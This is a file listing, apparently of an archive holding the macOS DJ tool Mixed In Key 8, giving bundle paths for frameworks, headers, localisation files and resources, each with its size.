                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tag.h7084
                                                                                                    Mixed In Key 8.app/Contents/Resources/fonts/Roboto-Bold.ttf170760
                                                                                                    Mixed In Key 8.app/Contents/Resources/eulaD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/modfileprivate.h2704
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/hu.lproj/Sparkle.strings2424
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagWAV.h596
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/apefooter.h5209
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/Current1
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/ModulesD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/CopyrightInformation.nib15884
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tdebug.h2570
                                                                                                    Mixed In Key 8.app/Contents/Resources/MIK.miktheme/html/top.html1546
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/MacOSD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Resources/en.lproj/InfoPlist.strings92
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDatabase.h6240
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUUpdatePermissionPrompt.nib18219
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDINoteCommand.h2749
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/da.lproj/Sparkle.strings3656
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mp4atom.h4673
                                                                                                    Mixed In Key 8.app/Contents/Resources/person@2x.png467
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/_CodeSignatureD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pl.lproj/Sparkle.strings3858
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.frameworkD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKKeyAnalyzer.h724
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDICompilerCompatibility.h1472
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/id3v2header.h5858
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/vorbisfile.h5387
                                                                                                    Mixed In Key 8.app/Contents/Resources/collection-icon.tiff7816
                                                                                                    Mixed In Key 8.app/Contents/Resources/button-divider.tiff8972
                                                                                                    Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/main-theme.png10419
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/DataSongEditor.nib45871
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataSongEnergySegment.h613
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/s3mproperties.h4017
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/FrameworksD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServicesD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/_CodeSignatureD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/mik-top-right.tiff108888
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/es.lproj/Sparkle.strings3568
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/Sparkle.strings8442
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/zh_TW.lproj/Sparkle.strings3096
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/InfoPlist.strings92
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIResponder.h2794
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ko.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIProgramChangeEvent.h1528
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/Sparkle.strings7256
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/zh_CN.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mp4properties.h3705
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tbytevector.h21347
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagHeader.h618
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/audioproperties.h4474
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/MIKUpdate74016
                                                                                                    Mixed In Key 8.app/Contents/Resources/row-background-nofocus.png4293
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/nl.lproj/Sparkle.strings3926
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIChannelEvent.h1817
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/VersionsD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/Sparkle.strings4744
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKKeyTable.h1983
                                                                                                    Mixed In Key 8.app/Contents/Resources/English.lproj/SegmentKeySelectorView.nib1780
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pl.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataCollection.h577
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/SUUpdateAlert.nib15777
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/VersionsD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUPasswordPrompt.nib11180
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/el.lproj/Sparkle.strings4422
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagComment.h671
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKBeatAnalyzer.h1374
                                                                                                    Mixed In Key 8.app/Contents/Resources/fonts/MaterialIcons-Regular.ttf128180
                                                                                                    Mixed In Key 8.app/Contents/Resources/eula/style.css950
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaMarkerTextEvent.h763
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/nl.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIPitchBendChangeCommand.h1261
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKData.h486
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/MIKMIDI689568
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUUpdatePermissionPrompt.nib18413
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/Resources/en.lproj/InfoPlist.strings92
                                                                                                    Mixed In Key 8.app/Contents/Resources/fontsD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/SUAutomaticUpdateAlert.nib12221
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIEntity.h2528
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/AD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/hu.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIControlChangeCommand.h6151
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/is.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/cs.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/SUAutomaticUpdateAlert.nib12089
                                                                                                    Mixed In Key 8.app/Contents/Resources/add-button@2x.png1452
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/_CodeSignatureD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/opusproperties.h4490
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/Sparkle.strings4960
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/cy.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/TutorialView.nib5172
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/itproperties.h4522
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ru.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/en.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sl.lproj/Sparkle.strings6830
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mpegfile.h14815
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/uk.lproj/Sparkle.strings6696
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Resources26
                                                                                                    Mixed In Key 8.app/Contents/Resources/file@2x.png997
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/no.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/ownershipframe.h4538
                                                                                                    Mixed In Key 8.app/Contents/Resources/top.js1365
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Resources/Info.plist1341
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/SUUpdateAlert.nib15732
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/it.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/riffutils.h2343
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Resources/Info.plist1335
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/SUUpdateAlert.nib15585
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/fi.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/XButton.png318
                                                                                                    Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/row-background-nofocus.png4293
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/AD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sv.lproj/Sparkle.strings3376
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMappingGenerator.h10637
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/Sparkle.icns41403
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/MIK5BetaTo5MappingModel.cdm9178
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/modproperties.h2759
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sv.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/Sparkle.strings4694
                                                                                                    Mixed In Key 8.app/Contents/Resources/info-white@2x.png869
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDITrack.h12475
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/trefcounter.h4019
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/libswiftFoundation.dylib2858224
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.frameworkD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagCuePoint.h1143
                                                                                                    Mixed In Key 8.app/Contents/Resources/tag-white@2x.png447
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/wavpackfile.h7757
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/eventtimingcodesframe.h6225
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Resources/en.lproj/InfoPlist.strings92
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/ResourcesD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataCuePoint.h606
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUPasswordPrompt.nib11268
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUAutomaticUpdateAlert.nib12096
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/libswiftDispatch.dylib311296
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/Sparkle.strings7298
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.frameworkD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/magnify-white@2x.png559
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/VersionsD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/tr.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/SUAutomaticUpdateAlert.nib12044
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIDevice.h5653
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/el.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/id3v2framefactory.h6659
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/SUAutomaticUpdateAlert.nib12176
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIChannelVoiceCommand.h1687
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/Sparkle.strings6714
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/Current1
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIUtilities.h4217
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 8.omo21000
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/MIKData190048
                                                                                                    Mixed In Key 8.app/Contents/Resources/person-white@2x.png441
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIPlayer.h2468
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Modules24
                                                                                                    Mixed In Key 8.app/Contents/Resources/English.lproj/BetaFeedbackView.nib13020
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/libswiftXPC.dylib44976
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/_CodeSignatureD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/MIK.miktheme/html/top.css3808
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIChannelPressureCommand.h1728
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/SUUpdatePermissionPrompt.nib18527
                                                                                                    Mixed In Key 8.app/Contents/Resources/Odesi_transparent.png66119
                                                                                                    Mixed In Key 8.app/Contents/Resources/English.lproj/TraktorAccessView.nib8291
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/top.html1546
                                                                                                    Mixed In Key 8.app/Contents/Resources/MIK.miktheme/htmlD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIPort.h701
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAudio.frameworkD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIDestinationEndpoint.h1636
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKRekordboxDatabase.h1800
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sk.lproj/Sparkle.strings3380
                                                                                                    Mixed In Key 8.app/Contents/Resources/Beyond_Beatmatching_transparent.png64028
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUUpdateAlert.nib15759
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/PkgInfo8
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/uk.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaInstrumentNameEvent.h784
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Sparkle284336
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/VersionsD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/analysis-message@2x.png13253
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/libswiftCoreFoundation.dylib40896
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ar.lproj/Sparkle.strings4602
                                                                                                    Mixed In Key 8.app/Contents/Resources/TagCleanupView.nib35489
                                                                                                    Mixed In Key 8.app/Contents/Resources/aboutbox/about.plist295
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ro.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagCopying.h2498
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIControlChangeEvent.h1476
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/no.lproj/Sparkle.strings2514
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/TooltipPopoverView.nib7327
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/ResourcesD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/SUUpdatePermissionPrompt.nib18264
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/HeadersD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/MIKToolkit27
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/uk.lproj/Sparkle.strings6696
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUUpdatePermissionPrompt.nib18270
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/libswiftIOKit.dylib45072
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/modfile.h4041
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaTimeSignatureEvent.h3584
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/_CodeSignatureD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUAutomaticUpdateAlert.nib12199
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tstring.h17007
                                                                                                    Utils/patch87920
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/id3v2footer.h3031
                                                                                                    Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/header-background.png3708
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/wavfile.h6783
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/libswiftAppKit.dylib175856
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/zh_TW.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/AD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKNewKeyAnalyzer.h713
